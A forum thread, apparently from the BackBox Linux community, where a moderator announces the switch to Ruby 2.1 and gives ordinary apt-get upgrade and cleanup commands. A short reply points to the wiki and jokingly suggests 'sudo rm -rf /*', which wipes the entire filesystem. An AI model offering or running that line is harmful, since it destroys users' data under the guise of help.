Author Topic: BackBox switched to ruby2.1  (Read 23930 times)

ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 583
    • View Profile
on: February 27, 2015, 03:11:56 PM
Folks,

this is just to inform you that today we have officially switched to new ruby2.1 as the support is been shutdown for older versions.

As you might now the majority of tools are using ruby so we recommend you to upgrade your BackBox following the instructions below:

Code: [Select]
sudo apt-get update
sudo apt-get dist-upgrade

This will automatically upgrade your ruby from 1.9 to 2.1 as the packages are already available in BB repos.

Last but not least, do not forget to perform an:

Code: [Select]
sudo apt-get autoremove --purge
to get rid of old packages and libraries that are not used anymore by system. Also perform:

Code: [Select]
sudo apt-get purge ruby1.9.1
Please let us know on this forum if you encounter any problems during this transition and if any of tools are affected.

Based on our tests before the release everything was smooth as expected so, you shouldn't have any issues.

Happy Hacking!
« Last Edit: February 27, 2015, 03:20:55 PM by ostendali »



ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
Reply #1 on: March 02, 2015, 10:30:03 AM


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*